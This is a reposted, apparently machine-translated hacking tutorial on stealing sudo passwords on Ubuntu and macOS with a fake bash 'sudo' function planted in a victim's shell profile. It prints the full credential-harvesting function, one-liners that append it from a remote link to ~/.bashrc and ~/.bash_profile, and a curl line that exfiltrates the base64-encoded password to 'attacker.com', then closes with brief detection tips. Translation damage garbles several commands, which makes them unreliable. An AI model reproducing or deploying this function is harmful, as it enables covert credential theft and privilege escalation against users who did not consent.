قالب وردپرس درنا توس
Home / Tips and Tricks / How To Steal Ubuntu & macOS Sudo Passwords Without Cracking «Null Bytes :: WonderHowTo

How To Steal Ubuntu & macOS Sudo Passwords Without Cracking «Null Bytes :: WonderHowTo



With a simple social engineering trick, sudo passwords can be captured in seconds without the knowledge of the target. The passwords can then be saved to a file or exported to another computer on the network.

After exploiting a system, penetration testers and hackers often start privilege attacks (Privesc). These attacks include kernel exploitation and password phishing. The attack presented here is a social engineering approach that uses bash functions to mimic the functionality of the sudo command.

How Sudo Works

Let's take the following whoami ] and id commands as an example. If you enter whoami in a terminal, the current user name is returned.

  whoami 
  tokyoneon 

The id command returns the user's user ID ( -u ), a unique identifier assigned to each user in the system. By default, in Debian and Ubuntu systems, a normal user (non-root user) is assigned the user ID 1000 (see below). Similarly, a normal user in macOS is assigned the 501-Uid.

  id -u 
  1000 

When sudo is raised, the provided command is raised and executed with root privileges (uid 0). This is all normal and normal behavior for sudo and Unix systems.

  sudo id -u 
  0 

The command can be used to identify the type as supplied Command is interpreted by the shell.

  Sudo type is / usr / bin / sudo 

In this case, sudo is interpreted as / usr / bin / sudo. This is also standard behavior. When someone executes the command sudo (eg sudo whoami ), he essentially does the following:

  / usr / bin / sudo / usr / bin / whoami [19659007] root 

Recommended Book on Amazon: Sudo Mastery: User Access Control for Real People

How Bash Functions Work

The Path sudo (or any command for that matter) can be changed to be transparent to the user. Similar to Bash Aliases, complex functions can be imported into the shell. Take the GIF below as an example.

We can execute a normal command apt-get update because "sudo" is no longer running interprets as a direct link to the real sudo binary file. It is now a function that prints arbitrary text. This can be easily abused. The "sudo" function can behave just like the real sudo while the password of the target is recorded and exfiltrated.

You should already have remote access

This article assumes that remote access to the target system has been established. With macOS targets, this can be achieved with Undetectable Payload, USB Drop Attack, or USB Rubber Ducky. Ubuntu and Debian servers can also be exploited by using various SSH and server-based vulnerabilities.

Step 1: Create a Malicious Bash Function

This type of abuse is better demonstrated in the following function. Comments have been added in green to explain the meaning of each line.

  function sudo () {
# A realsudo variable is created. It calls the command "which" to search for
# the path to the real sudo binary. This will be used later in the function
# execute the desired command of the destination.
realsudo = "$ (which sudo)"

# The `read` command prompts the target with a convincing password (` -p`)
# Inquiry. The argument & # 39; -s & # 39; hides the input password as well as the real one
# Sudo command would. The destination password is then set in "inputPasswd".
# variable.
read -s -p "[sudo] $ USER password:" inputPasswd

# There are two `printf 'commands separated by a semicolon.
# The first one just prints a new line in the terminal, as a real sudo
# does. The second writes the username and password of the destination in a
# File named "hackedPasswd.txt" in the / tmp directory.
printf " n"; printf & # 39;% s  n & # 39; "$ USER: $ inputPasswd"> /tmp/hackedPasswd.txt

# Alternatively to writing the password in the / tmp directory
# It can be exported to the server of the attacker. Comment this down
# "coded" and "curl" lines to enable this feature. The password
# is encoded with `base64` to facilitate transmission in the URL.
# encoded = $ (printf #% s # $ inputPasswd | base64)> / dev / null 2> & 1
# curl -s "http://attacker.com/$USER:$encoded"> / dev / null 2> & 1

# The -S option allows users to enter their sudo password with the command
# Line. This executes any "exit" command ("-c") as root
# user (`-u`) to unlock the sudo timeout feature. This command and his
# The output is hidden by the target (/ dev / null). It's only allowed here
# Sudo use for future commands.
# For more information about sudo timeouts and / dev / null, see:
# https://itsfoss.com/change-sudo-password-timeout-ubuntu/
# https://stackoverflow.com/questions/10508843/what-is-dev-null-21
$ realsudo -S << < "$inputPasswd" -u root bash -c "exit" > / dev / null 2> & 1

# If the sudo timeout is enabled, privileged commands can be executed without
# prompts the user for a password. This line executes the destination
# desired command.
$ realsudo "$ {@: 1}"
} 

Let's see how this function appears to the target.

As we can see, the target is still prompted with a password when trying to install software. A closer look at the type shows the harmful function. The captured password is stored in the file /tmp/hackedPasswd.txt.

Option 1: Targeting Debian and Ubuntu Systems

For Debian and Ubuntu systems, when opening a new terminal or shell, the ~ / .bashrc file appears. This file (which can be changed by non-root users) usually defines useful attributes such as aliases, history delimiter, and color variables. It can also be misused to import malicious bash functions. This applies to Debian servers, Ubuntu desktops and MacOS systems.

For the sake of simplicity, I uploaded the malicious sudo feature to my GitHub page. It can be downloaded to the target system with the following command.

  curl # https: //git.io/fhNWm&#39; >> ~ / .bashrc 

This is added ( >> ) The sudo function is located at the bottom of the target's .bashrc file. If the target logs on to its server from now on (for example, SSH) and executes a sudo command, the password passed is stored in the / tmp directory. Alternatively, if curl is not installed on the target system, wget can be used.

  wget -O- # https: //git.io/fhNWm&#39; >> ~ / .bashrc 

Option 2: Target macOS systems

This type of attack is less effective against macOS users. Simply because they are not so likely to open a terminal and execute elevated commands. MacOS users do not need the sudo command as often as VPS targets or Ubuntu desktop users. Still, I'll show how to do this against a macOS target, as it could be helpful to some penetration testers exploring every possible way to increase their backdoor.

Like the ~ / .bashrc, macOS systems run the ~ / .bash__profile file when opening Terminal. This file can be used to store malicious bash functions. Use the following command wget to import the function into the Bash profile of the target.

  wget -O- # https: //git.io/fhNWm&#39; >> ~ / .bash_profile 

When the target opens terminal and executes a command sudo . The password is stored in the / tmp directory. This is shown in the following screenshot.

Step 2: Exfiltrate the password (optional)

In addition to saving the password in the / tmp directory, it may be desirable to set the password to send another computer or server. A proper PHP listener could be set up to intercept the POST data containing the password in an elegant way.

I chose a somewhat unorthodox approach and a quick and dirty solution. This method requires a simple Python3 server set up on the attacker's Kali system. The module http.server ( -m ) creates a web server using the port 80 .

  python3 -m http.server 80 
  Serving HTTP on 0.0.0.0 Port 80 ... 

There are commands for encoding and exfiltrating passwords written to the sudo function. It is disabled by default and must be uncommented to enable it.

  encoded = $ (printf #% s # $ inputPasswd | base64)> / dev / null 2> & 1;
curl -s "http://attacker.com/$USER:$encoded"> / dev / null 2> & 1; 

The password is encrypted with base64 to simplify sending the URL. Curl is used to execute a GET request in the background ( -s ) on the server of the attacker, which is located in the "attacker.com" domain. This domain should be changed to the local IP address of the attacker (192.168.1.X) or to the VPS IP address. Errors and outputs generated by the command curl are enforced with the redirect 2> & 1 in / dev / null. This prevents curl from accidentally reporting errors to the terminal if the attacker's server is unreachable for some reason.

The username and password of the destination are actually being sent in the URL. Imagine that you want to request "http: //192.168.1.X/tokyoneon: sUp3R-S3cUre_P @ $$ w0000rD!" The request would certainly fail, there is no such website. However, the encrypted password is stored in the attacker's error log. Below is an example of such an error.

  HTTP is connected to 0.0.0.0 port 80 ...
127.0.0.1 - - [27/Feb/2019 00:05:12] Code 404, message file not found
127.0.0.1 - - [27/Feb/2019 00:05:12] "GET / user: c1VwM1ItUzNjVXJlX1BAJCR3MDAwMHJEIQ == HTTP / 1.1" 404 - 

Simple echo 450 . -d ) it

  echo & # 39; c1VwM1ItUzNjVXJlX1BAJCR3MDAwMHJEIQ == & # 39; | base64 -d 
  sUp3R-S3cUre_P @ $$ w0000rD! 

Bash Function Malfunction Protection

Malicious Bash functions are difficult to detect. If an attacker in your system changes the ~ / .bashrc or ~ / .bash_profile file, you may have bigger issues to worry about.

As we learned earlier, the command is a very useful tool. It can be used to interpret the provided commands. Commands like sudo should only call the corresponding binary file or sometimes appear as a "hash" in the session. All other conditions should be investigated.

  Type sudo 
  sudo is / usr / bin / sudo 

It is also a good idea to manually check the ~ / .bashrc file. Hackers often use this file to embed persistent backdoors in Unix systems (for example, try a new Netcat connection every time a terminal is opened). This can be with nano or vim .

  nano ~ / .bashrc 

Final Thoughts

. For example, similar functions can be created for ssh and other remote management protocols. An attacker could steal SSH credentials and switch to other systems within the control of the target. Likewise, a malicious function can be created for the command su . This command, such as sudo was developed to increase user privileges and can easily be imitated with simple bash functions.

If you liked this article, follow me on Twitter @tokyoneon_ and GitHub to keep up with my current projects. For questions and concerns, leave a comment or message on Twitter.

Do not miss: Use the Cowrie SSH Honey Pot to catch attackers in your network

Cover photo by Arian Darvishi / Unsplash; Screenshots of tokyoneon / zero byte




Source link